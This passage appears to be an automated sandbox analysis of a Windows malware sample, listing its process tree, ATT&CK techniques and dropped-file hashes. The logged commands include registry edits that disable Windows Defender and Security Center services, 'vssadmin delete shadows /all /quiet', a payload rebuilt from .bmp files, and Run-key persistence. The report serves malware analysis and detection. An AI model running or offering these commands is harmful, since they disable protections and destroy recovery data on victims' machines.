"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1616

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1308

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1876

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1564

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:456

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:856

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:884

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1120

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1196

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1612

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1204

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:856

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:328

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:916

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:436

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1732

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:396

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:908

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1556

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:2040

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1128

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:328

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1632

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1892

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1692

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2004

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1200

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1588

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1884

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1752

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:956

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:560

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:1632

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2016

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1944

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1056

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:836

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1060

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:548

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:956

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:1008

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1296

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:948

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1696

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
9⤵
- Modifies security service
PID:1472

C:\ProgramData\ConsoleApp\kernel32.exe
kernel32 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:364

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
7⤵
- Executes dropped EXE
PID:908

C:\ProgramData\ConsoleApp\kernel32.exe
"C:\ProgramData\ConsoleApp\kernel32.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
8⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1864

C:\Windows\System32\reg.exe
"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
9⤵
PID:984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Get-MpPreference"
6⤵
PID:1996

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
6⤵
- Interacts with shadow copies
PID:276

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\execute.bat" "
5⤵
- Loads dropped DLL
PID:888

C:\Windows\SysWOW64\mode.com
mode 65,10
6⤵
PID:1200

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e file.zip -p___________25092pwd17773pwd27010___________ -oextracted
6⤵
- Executes dropped EXE
PID:784

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_11.zip -oextracted
6⤵
- Executes dropped EXE
PID:1632

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_10.zip -oextracted
6⤵
- Executes dropped EXE
PID:1288

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_9.zip -oextracted
6⤵
- Executes dropped EXE
PID:1096

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_8.zip -oextracted
6⤵
- Executes dropped EXE
PID:368

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_7.zip -oextracted
6⤵
- Executes dropped EXE
PID:2016

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_6.zip -oextracted
6⤵
- Executes dropped EXE
PID:908

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_5.zip -oextracted
6⤵
- Executes dropped EXE
PID:880

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_4.zip -oextracted
6⤵
- Executes dropped EXE
PID:1828

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_3.zip -oextracted
6⤵
- Executes dropped EXE
PID:1812

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_2.zip -oextracted
6⤵
- Executes dropped EXE
PID:752

C:\ProgramData\ConsoleApp\7za.exe
7za.exe e extracted/file_1.zip -oextracted
6⤵
- Executes dropped EXE
PID:1256

C:\ProgramData\ConsoleApp\eDbwCBj.exe
"eDbwCBj.exe"
6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1692

C:\Windows\SysWOW64\at.exe
at.exe
7⤵
PID:1536

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Speranza.bmp
7⤵
PID:1008

C:\Windows\SysWOW64\cmd.exe
cmd
8⤵
- Loads dropped DLL
PID:1952

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^MRGsyaFvsBfEYwHcFenTgTsUhffAiSwxLsmKcSPEfQgUfzhvsafEbXnSmMrPetfmmVTGCWZNhUDnFbETwTpPDbWOTGlJOZBkBPcxAHUxzCdCzqheilOpVmVwYtNVMfYhaaWP$" Baciocchi.bmp
9⤵
PID:968

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com
Nemica.exe.com q
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1080

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Nemica.exe.com q
10⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1168

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\RegAsm.exe
11⤵
- Loads dropped DLL
PID:1436

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
9⤵
- Runs ping.exe
PID:1164

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ProgramData\ConsoleApp\ControlSet002.bat" "
5⤵
PID:1972

C:\Windows\SysWOW64\timeout.exe
timeout /T 120 /NOBREAK
6⤵
- Delays execution with timeout.exe
PID:1612

C:\Windows\SysWOW64\cmd.exe
cmd /c rd /q /s "C:\ProgramData\ConsoleApp\"
6⤵
PID:1608

C:\Windows\SysWOW64\timeout.exe
timeout /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1884

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\Start.vbs"
3⤵
PID:2000

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211028163156.log C:\Windows\Logs\CBS\CbsPersist_20211028163156.cab
1⤵
- Drops file in Windows directory
PID:1548

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:1740

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

BITS Jobs

T1197

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

File Deletion

T1107

BITS Jobs

T1197

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Start.vbs
MD5
617ac4b9688cc7f012e84993e5959954

SHA1
0d7ab1c86b5ca1f1a170d08acea155a9b8774c78

SHA256
d12c6fe9ea0dcba0ed7bba18d01bd66a1977e564765c4839adc0276cd12a009b

SHA512
95d33c39c41b355c14b6cbba6368b79e91f81a83f03472f730b3e1d88f3ead837261cbbb2e1528b0cbb5e6a7141236bc9f404fec2c4b6e07515833efc05c0b33

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\7za.exe
MD5
c3d309156b8e8cf1d158de5fab1c2b40

SHA1
58ad15d91abac2c6203e389ac8a8ff6685406d41

SHA256
993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c

SHA512
2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

Download Submit
C:\ProgramData\ConsoleApp\ControlSet000.bat
MD5
88105ac7d8d4bedefc5dafb4c0b8a5bf

SHA1
09eef2b0f85f9760ad744468474214c95f3872cc

SHA256
145bb60685ba6f37aca0a5bd87728b6f8c06d130060b80dccb536ccd4943b992

SHA512
f5bf945749e738e0962c47a393a2e33832e7ce482c263e39cfa2c3a9629d58972d9124ca723bfae72835ed7d2a1fb5fed7bd13a8fa9ab7ed0f761074fe503e58

Download Submit
C:\ProgramData\ConsoleApp\ControlSet001.bat
MD5
7e6cf2526d9c0cecd79c00ecad8b7216

SHA1
f6a78b432858c139be69731246ea03d4381805ac

SHA256
e3352d38ac6c968581d1df26865f7c7cee34e3692c32c933ea274d84e87c932f

SHA512
948aa58d47da7ea8f9a0c4107c89f98f84dfb3b062d5cabf48fb0b6de432fd0b7b78aafbfab61d2a5d53f6ffbab76d74ce674f7f0f67ebd080df13151b33d6ac

Download Submit
C:\ProgramData\ConsoleApp\ControlSet003.vbs
MD5
cedbc2b4a64107eed135adb98b678f2d

SHA1
6f744946e4d9d1b4fa82882f0a61cbd70468f227

SHA256
25a6210a703c6274232184ab42c0b570bacf147870d8663e9cf04e1edf29b7bc

SHA512
ed15bfabd1056e066afeaa01cca5f32918d7da141bdc1dea8589104b50831d5acae043cf0cae0aaa9ab5aa3dabd1bffc12a4ce8e72fa483f958bc45040211ccd

Download Submit
C:\ProgramData\ConsoleApp\hfile.bin
MD5
0bc0ab4f89dba36e9c51689c91ed2b20

SHA1
69ed3ebc9c922907435318d1e9bc61db4405a52e

SHA256
f142491365b35a78cac70c0139e606241d732c7f556694efc51ab07724e08f04

SHA512
9295410dd6b84e3142368bff8f1cc480f61a6f3a67037f046111f5d6506af7543e70f03df4a7b6e296f1091b1f480500192d9d88cae54780fcc27618b01123ba

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
1a6549788e97e5d07560f58dc11088424f0f90815f0ced2173be169ad4dbf0e55cd19b40fbf8f65d65e0f6cadb21c0489dc6a8de999859d12244879f4722ec95

Download Submit
C:\ProgramData\ConsoleApp\kernel32.exe
MD5
71c7975385f73ae32b06f69dbe79290b

SHA1
05a1197cb8bd88447199e42a75bfcf99e32f2c48

SHA256
c0abbeea8ae726503bc5643f3471e378d92fcb59a37043062bbf9ba64d95004c

SHA512
